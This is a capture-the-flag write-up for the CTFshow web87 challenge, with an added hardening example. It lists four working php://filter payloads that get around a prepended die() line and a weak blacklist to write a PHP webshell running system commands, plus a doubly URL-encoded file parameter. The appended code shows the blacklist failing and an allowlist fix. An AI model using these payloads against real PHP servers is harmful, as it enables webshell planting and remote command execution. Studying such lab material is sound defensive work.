CTFshow Web Basics: File Inclusion, web87

Challenge code

<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-16 11:25:09
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-16 21:57:55
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
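if(isset($_GET['file'])){
    // $_GET values have already been URL-decoded once by PHP
    $file = $_GET['file'];
    $content = $_POST['content'];
    // Blacklist: "php", "data", ":" and "." are each replaced with "???"
    $file = str_replace("php", "???", $file);
    $file = str_replace("data", "???", $file);
    $file = str_replace(":", "???", $file);
    $file = str_replace(".", "???", $file);
    // The path is URL-decoded a second time, after the blacklist has run;
    // a die() line is prepended to whatever is written
    file_put_contents(urldecode($file), "<?php die('大佬别秀了');?>".$content);
}else{
    highlight_file(__FILE__);
}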

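We need to get past the prepended die so that a one-line webshell can be written.

Method 1: (the later methods are solutions from similar challenges)

Use a Caesar cipher (ROT13) on the written data so that the letters of die are shifted by 13 positions and the prefix no longer works. The pseudo-protocol must be URL-encoded twice, otherwise it gets replaced: PHP decodes the query string once before the str_replace() calls run, and the code then calls urldecode() itself.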

php://filter/write=string.rot13/resource=shell.php

Payload:

?file=%70%68%70%3a%2f%2f%66%69%6c%74%65%72%2f%77%72%69%74%65%3d%73%74%72%69%6e%67%2e%72%6f%74%31%33%2f%72%65%73%6f%75%72%63%65%3d%73%68%65%6c%6c%2e%70%68%70

content=<?cuc flfgrz('png s*');?>

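Method 2:

php://filter/write=convert.base64-decode/resource=shell.php

content=ccPD9waHAgc3lzdGVtKCdjYXQgZionKTs/Pg==

(The leading cc is there so that, combined with the prefix in front of it, the data decodes correctly: base64 decoding skips bytes outside its alphabet, so the prefix contributes only the 6 characters phpdie, and cc pads that to 8, a multiple of 4.)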

Method 3:

php://filter/write=string.strip_tags|convert.base64-decode/resource=shell.php

content=PD9waHAgc3lzdGVtKCdjYXQgZionKTs/Pg==

(The tags are stripped first, which makes the die part disappear, and the rest is then base64-decoded.)

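Method 4:

php://filter/write=convert.iconv.UCS-2LE.UCS-2BE/resource=shell.php

content=a?<hp pystsme'(ac t*f)'?; >

(Every pair of characters is swapped left to right; the leading a is needed because the die prefix has an odd number of bytes.)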
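
Why the blacklist in the challenge code does not hold (the double-encoding remark in Method 1), next to a write path that cannot reach a stream wrapper. This is an added example, not part of the original write-up or the challenge; the function names and the /var/app/uploads directory are assumptions.

```php
<?php
// Added example (not the challenge's code); function names are hypothetical.

// The challenge's check, reproduced: blacklist first, urldecode() afterwards.
function blacklist_then_decode(string $file): string
{
    foreach (['php', 'data', ':', '.'] as $bad) {
        $file = str_replace($bad, '???', $file);
    }
    return urldecode($file); // decoding after filtering undoes the filter
}

// Hardened form: no second decode, strict allowlist, fixed directory and
// fixed non-executable extension, so no wrapper, traversal or .php target.
function safe_target(string $name, string $dir): ?string
{
    if (preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $name) !== 1) {
        return null;
    }
    return rtrim($dir, '/') . '/' . $name . '.txt';
}

// Constructed input: the filter URL from Method 1 with every byte
// percent-encoded, i.e. what $_GET['file'] holds after PHP's own decoding
// of a doubly encoded query string.
$wrapper = 'php://filter/write=string.rot13/resource=shell.php';
$seen = implode('', array_map(
    fn(string $c): string => '%' . bin2hex($c),
    str_split($wrapper)
));

// The blacklist finds nothing to replace, then urldecode() rebuilds the URL.
var_dump(blacklist_then_decode($seen) === $wrapper);

// The allowlist rejects the encoded form ('%' is not permitted) and the
// decoded form (':', '/', '.' and '=' are not permitted).
var_dump(safe_target($seen, '/var/app/uploads'));
var_dump(safe_target($wrapper, '/var/app/uploads'));

// A plain name maps to a fixed location; /var/app/uploads is an assumed path.
var_dump(safe_target('notes_2023', '/var/app/uploads'));
```

Because the final path always begins with the fixed directory, PHP treats it as a plain file and none of the write filters from Methods 1 to 4 can be applied to the prepended die line.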

posted @ 2023-01-27 21:48  Hacker&Cat